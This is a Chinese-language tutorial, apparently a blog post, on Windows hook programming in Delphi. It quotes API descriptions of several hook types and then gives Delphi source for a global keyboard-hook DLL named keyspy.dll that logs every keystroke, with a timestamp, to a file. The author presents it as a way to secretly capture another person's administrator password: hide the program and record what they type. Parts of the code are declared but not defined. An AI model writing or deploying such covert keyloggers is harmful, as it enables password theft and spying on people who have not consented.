每個程序都有自己的生存空間,在Windows系統中你可以在任何時候讓你的程序執行一些操作,還可以觸發消息,觸發的消息分為三種,一是操作你程序的界面,onClick,onMouseMove等等,另外一個可以使用Windows的消息機制來捕獲一些系統消息,但是如果你想在任何時候監控任何程序的情況那可能你就會選擇HOOK來實現了,雖然還有其他方法,但不得不承認,HOOK是一個比較簡單解決問題的途徑。
Windows提供了Hook機制,定義為
A callback function provided by an application that receives certain data before the normal recipient of the data. The hook function can thus examine or modify the data before passing it on.
可以使用諸多Hook的方式,一下列舉一些常用的參數,這些在WINDWOS API幫助中都有:
CALLWNDPROC ,CALLWNDPROCRET :
The WH_CALLWNDPROC and WH_CALLWNDPROCRET hooks enable you to monitor messages sent to window procedures by the SendMessage function. Windows calls a WH_CALLWNDPROC hook procedure before passing the message to the receiving window procedure, and calls the WH_CALLWNDPROCRET hook procedure after the window procedure has processed the message.
CBT:
Windows calls a WH_CBT hook procedure before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the input focus; or before synchronizing with the system message queue. The value the hook procedure returns determines whether Windows allows or prevents one of these operations. The WH_CBT hook is intended primarily for computer-based training (CBT) applications.
KEYBOARD:
he WH_KEYBOARD hook enables an application to monitor message traffic for WM_KEYDOWN and WM_KEYUP messages about to be returned by the GetMessage or PeekMessage function. You can use the WH_KEYBOARD hook to monitor keyboard input posted to a message queue.
下面就來舉個例子(使用Delphi7.0調試通過):
如果你需要訪問某個人的機器,那在運行SB之後那個人就會在你機器上敲入他的adminsitrator密碼,當然,你也可以使用黑客工具來得到他的密碼,但是,為什麼不自己嘗試一下寫個程序記錄所有的鍵盤操作呢?
首先需要申明一點,Hook不同於一般的應用程序,需要作為一個全局DLL出現,否則無法在你程序不激活的狀態捕獲其他信息的,(當然你可以用Windows消息,這個問題不在這裡討論)。
寫個DLL定義一下函數
function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
procedure EntryPointProc(Reason: Integer);
const
hMapObject: THandle = 0;
begin
case reason of
DLL_PROCESS_ATTACH:
begin
hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), '_CBT');
rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
end;
DLL_PROCESS_DETACH:
begin
try
UnMapViewOfFile(rHookRec);
CloseHandle(hMapObject);
except
end;
end;
end;
end;
procedure keyhookexit;far;
begin
if hNexthookproc<>0 then endkeyhook;
exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
if hNexthookproc<>0 then
begin
unhookwindowshookex(hNexthookproc);
hNexthookproc:=0;
messagebeep(0);
end;
result:=hNexthookproc=0;
MainHandle:=0;
end;
function Setkeyhook:bool;export;
begin
hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
result:=hNexthookproc<>0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;
lparam:lparam):lresult;stdcall;export;
var
s:Tstringlist;
begin
if icode<0 then
begin
result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
exit;
end;
if lparam<0 then
begin
exit;
end;
s:=TStringlist.Create;
if FileExists(afilename) then
s.LoadFromFile(afilename);
//將敲打的鍵盤字符保存到文件中
s.Add(formatdatetime('YYYYMMDD hh:nn:ss:zzz: ',now) + char(wParam) );
s.SaveToFile(afilename);
s.Free;
result:=0;
end;
Dll的Project文件中定義如下
exports
setkeyhook index 1,
endkeyhook index 2,
SetMainHandle index 3;
begin
hNexthookproc:=0;
procsaveexit:=exitproc;
DllProc := @EntryPointProc;
EntryPointProc(DLL_PROCESS_ATTACH);
end.
這樣DLL就定義好了,接下來就是畫個界面
function setkeyhook:bool;external 'keyspy.dll';
function endkeyhook:bool;external 'keyspy.dll';
procedure SetMainHandle(Handle: HWND); external 'keyspy.dll';
//開始捕獲鍵盤
SetMainHandle(handle);
setkeyhook
//中止捕獲鍵盤
endkeyhook
然後吧你程序隱蔽起來,啟動捕獲鍵盤,在中止捕獲之前,所有鍵盤操作都會被記錄到你所定義的filename這個文件名中去,注:這些代碼是臨時寫的,僅是為了說明如何寫個hook程序。
另外Hook的功能不僅僅是簡單使用,這就需要靠大家靈活運用了,可以跟很多windows API來配合,通過很多技巧作出讓人意想不到的效果。
